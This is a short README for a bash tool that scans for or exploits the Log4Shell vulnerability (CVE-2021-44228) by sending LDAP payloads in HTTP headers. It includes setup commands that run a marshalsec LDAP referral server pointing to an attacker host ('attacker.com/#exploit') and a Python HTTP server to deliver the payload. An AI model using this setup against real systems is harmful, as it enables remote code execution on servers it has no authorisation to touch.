
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.
Bash script that allows identifying and/or exploiting the Log4Shell vulnerability remotely. This tool performs various tests using LDAP payloads and X-Api-Version, User-Agent, and X-Forwarded-For headers.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Enable an HTTP server python3 -m http.server 8080
Have Java installed #sudo apt install default-jre
Have Curl installed #sudo apt-get install curl
Enter the following parameters:
#Example scanning an application on the internal network:

#Example scanning an application on the internet:
